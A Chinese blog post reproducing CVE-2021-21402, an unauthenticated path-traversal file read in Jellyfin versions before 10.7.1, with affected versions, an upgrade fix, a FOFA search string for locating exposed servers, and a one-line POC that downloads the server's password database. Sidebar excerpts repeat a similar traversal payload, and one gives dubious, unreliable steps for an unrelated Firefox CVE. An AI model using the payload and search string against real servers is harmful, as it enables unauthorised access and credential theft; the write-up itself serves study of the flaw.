[ 漏洞复现篇 ]Jellyfin 未授权任意文件读取 CVE-2021-21402

已于 2022-07-20 20:52:42 修改
阅读量2.6k 收藏 71
点赞数 65
分类专栏: 漏洞复现篇 文章标签: 安全 web安全 系统安全
于 2022-05-31 21:45:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51577576/article/details/125063571
版权

🍬博主介绍

👨‍🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~

✨主攻领域:【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】

🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

目录

🍬博主介绍

一、漏洞简介

二、漏洞编号(选填)

三、漏洞靶场(选填)

四、漏洞影响版本(必填)

五、FOFA Dork/Google Dork(选填)

六、漏洞修复方案(必填)

七、漏洞利用过程(必填)

1. 访问该网站使用burpsuite抓包

2. 构造URL请求头  jellyfin将从服务器下载带有密码的数据库:

3. POC:

八、参考文章

一、漏洞简介

        jellyfin 是一个自由的软件媒体系统,用于控制和管理媒体和流媒体。它是 emby 和 plex 的替代品,它通过多个应用程序从专用服务器向终端用户设备提供媒体。Jellyfin 属于 Emby 3.5.2 的下一代,并移植 .NET 核心框架,以支持完全的跨平台支持。

        Jellyfin10.7.1版本中,攻击者恶意构造请求将允许从Jellyfin服务器的文件系统中读取任意文件。当Windows用作主机OS时,此问题更加普遍。暴露于公共Internet的服务器可能会受到威胁。在版本10.7.1中已修复此问题。解决方法是,用户可以通过在文件系统上实施严格的安全权限来限制某些访问。

二、漏洞编号(选填)

CVE-2021-21402

三、漏洞靶场(选填)

自行搭建何时版本就行

我是用Centos7搭建jellyfin10.6.4

可参考搭建过程:在CentOS 7下安装Jellyfin_猫咪没有Fish的博客-CSDN博客

四、漏洞影响版本(必填)

Jellyfin < 10.7.1

五、FOFA Dork/Google Dork(选填)

title="Jellyfin"

六、漏洞修复方案(必填)

更新到10.7.1或更高版本。

七、漏洞利用过程(必填)

1. 访问该网站使用burpsuite抓包

2. 构造URL请求头  jellyfin将从服务器下载带有密码的数据库:

3. POC:

/Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/

八、参考文章

https://blog.csdn.net/weixin_52834047/article/details/116592800

https://gitee.com/zqxdxxjsyxgs_admin/h2021hvv_vul/blob/master/0408/Jellyfin%E6%9C%AA%E6%8E%88%E6%9D%83%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%20-%20CVE-2021-21402.md

_PowerShell
关注
  • 65
    点赞
  • 71
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 56
    评论
专栏目录
CVE-2021-21402 Jellyfin任意文件读取漏洞复现
afei001
04-24 1165
目录 1.漏洞概述 2.漏洞成因 3.影响版本 4.漏洞等级 5.漏洞复现 5.1 FOFA实战复现 5.2 CVE-2021-21402_Jellyfin_POC.py 6.漏洞修复 声明:请勿进行非授权测试,否则后果自负。 1.漏洞概述 jellyfin是一个自由的软件媒体系统,用于控制和管理媒体和流媒体。它是emby和plex的替代品,它通过多个应用程序从专用服务器向终端用户设备提供媒体。Jellyfin 属于Emby3.5.2的下一代,并移植.NET核...
Jellyfin任意文件读取漏洞CVE-2021-21402
逗比大师的博客
04-09 854
FOFA语句: title="Jellyfin" 可以通过访问 http://<url>/Audio/anything/hls/<文件路径>/stream.mp3/ 读取任意文件。 POC: http://xxx.xxx.xxx.xxx/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/strea...
探索Jellyfin YouTube元数据插件:增强你的媒体中心体验
最新发布
gitblog_00033的博客
04-27 558
探索Jellyfin YouTube元数据插件:增强你的媒体中心体验 项目地址:https://gitcode.com/ankenyr/jellyfin-youtube-metadata-plugin 项目简介 Jellyfin YouTube Metadata Plugin 是一个为Jellyfin媒体服务器设计的扩展插件。它允许用户将YouTube视频集成到Jellyfin中,并自动获取相关...
jellyfin任意文件读取漏洞CVE-2021-21402
xxx9686的博客
09-20 410
Jellyfin 是一个免费软件媒体系统。在 10.7.1 版之前的 Jellyfin 中,带有某些终结点的精心设计的请求将允许从 Jellyfin 服务器的文件系统中读取任意文件。当 Windows 用作主机 OS 时,此问题更加普遍。暴露于公共 Internet 的服务器可能会受到威胁。在版本 10.7.1中已修复此问题。解决方法是,用户可以通过在文件系统上实施严格的安全权限来限制某些 访问,但是建议尽快进行更新。
CVE-2021-21402漏洞复现Jellyfin任意文件读取
weixin_52834047的博客
05-10 2067
1.漏洞描述 Jellyfin是一个自由软件媒体系统,在10.7.1版之前的Jellyfin中,攻击者可以通过精心构造的请求读取Jellyfin服务器端的任意文件,当使用Windows主机作为操作系统时,此问题将变得跟加普遍,该漏洞已在10.7.1版本中修复。 2.影响版本 Jellyfin<10.7.1 3.复现步骤 1.根据关键词在fofa上搜索包含该漏洞的网站 2.访问网站用burpsuite抓包 3.构造URL请求头 jellyfin.db将从服务器下载带有密码的...
jellyfin任意文件读取漏洞CVE-2021-21402 环境搭建
aweiweiweiei1的博客
05-12 879
jellyfin任意文件读取漏洞CVE-2021-21402 环境搭建教程 https://www.xiaoz.me/archives/14368
CVE-2021-21402-Jellyfin:jiaocollCVE-2021-21402-果冻
04-09
CVE-2021-21402-Jellyfin-任意文件读取此POC仅用于学习交流,由此产生的一切后果本人不承担
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
关于CVE-2023-27161 Jellyfin流媒体系统存在SSRF漏洞的学习
weixin_48421613的博客
03-16 877
Jellyfin 直到 v10.7.7 通过组件 /Repository 包含服务器端请求伪造 (SSRF)。
nastool搭建日志
xyaocc的博客
10-16 8593
网上关于nastool这个工具的搭建流程基本都一样,不管是docker还是群晖套件,如果只是下载电影电视看看 这些教程基本上都够用了,但是我的需求是使用nastool的硬连接功能实现PT保种文件夹和jellyfin媒体文件夹分开管理,从nastool的功能介绍中所描述的硬连接功能是非常好用的,利用nastool整理pt下载的各式各样的影片非常直观和方便,但问题随之而来。并不是完全搜索不到,只能找到一两个,不知道是不是jellyfin对中文文件夹长度识别有限制。时间:2022年10月16日。
轻量 Jellyfin 媒体服务器挂载轻量对象存储
若海
12-01 635
轻量服务器的玩法众多,也有很多小伙伴把它当作媒体服务器来使用。但轻量服务器的默认存储空间有限,无法存放大量的媒体文件。本文将引导读者使用轻量对象存储作为Jellyfin的媒体库,快速部署一个超大容量的媒体服务器。
家庭影院Jellyfin搭建,linux网页视频播放器
热门推荐
星星的博客
02-07 1万+
搭建家庭影院系统,适用于网页在线播放,APP,TV盒子 环境:Centos7+docker+jellyfin 效果: 一、安装软件 1、官网直达链接,选择下载,从Docker安装稳定版,按官网提示输入命令 2、前2个命令不变,第三个命令要注意,请替换“资源磁盘目录为自己的目录”,其他不用更改 docker run -d -v /srv/jellyfin/config:/c...
CVE-2020-1472漏洞实战 深度剖析
Ms08067安全实验室
11-18 9122
本文作者:Faith(Ms08067实验室 内网安全攻防知识星球)0x00漏洞说明CVE-2020-1472是继MS17010之后一个比较好用的内网提权漏洞,影响Windows Serv...
Windows DNS Server 远程代码执行漏洞 (CVE-2021-24078) 的详细原理分析
smellycat000的专栏
02-11 3223
聚焦源代码安全,网罗国内外最新资讯!漏洞简介Windows DNS Server 是 Windows Server 服务器上的一项重要功能组件, 负责调度和处理域内主机的所有DNS相关服...
Git安全漏洞检查CVE-2021-21300
GitCode
03-16 2217
CVE-2021-21300 安全漏洞检查 本项目模拟一个利用CVE-2021-21300漏洞执行仓库内恶意脚本的行为,如果您的git客户端有 CVE-2021-21300 的安全漏洞,执行 git clone 本仓库时会输出以下内容 CVE-2021-21300 detected !!! Please update your git to fix the vulnerability CVE-2021-21300 影响分析 由于对 symbolic links 处理的问题,导致在不区分大小写的文件系统例
cve-2021-3618漏洞复现
02-06
CVE-2021-3618漏洞是指影响了Mozilla Firefox浏览器的一个安全漏洞。该漏洞复现步骤如下: 1. 首先,你需要安装最新版本的Mozilla Firefox浏览器。确保你的浏览器已经更新到最新版本,因为最新版本通常会修复已知的漏洞。 2. 在Firefox浏览器中,打开一个新的标签页,并输入“about:config”(不包括引号)并按下Enter键。这将打开Firefox的高级配置页面。 3. 在搜索栏中输入“security.sandbox.content.level”(不包括引号),然后按下Enter键。你将看到一个名为“security.sandbox.content.level”的首选项。 4. 将“security.sandbox.content.level”的值更改为“0”(不包括引号)。这将禁用Firefox的内容沙箱。请注意,这将降低浏览器的安全性,请谨慎操作。 5. 关闭并重新启动Firefox浏览器,使更改生效。 6. 现在,你可以尝试复现CVE-2021-3618漏洞。使用Firefox浏览器访问一个存在安全漏洞的网站,如已知的恶意或受攻击的网站,或使用特定的payload触发漏洞。 7. 如果复现成功,可能会出现安全漏洞所导致的异常行为,比如系统崩溃、恶意代码执行等。如果没有出现异常行为,可能是因为已经修复了该漏洞或在你的环境中无法成功利用。 需要注意的是,复现CVE漏洞可能存在风险,并可能对你的计算机造成不可逆转的损害。这种操作只适用于在合法情况下进行安全测试和研究的专业人士,不推荐普通用户进行尝试。实施复现操作之前,请确认你已经了解并接受相关风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 56
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_PowerShell

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值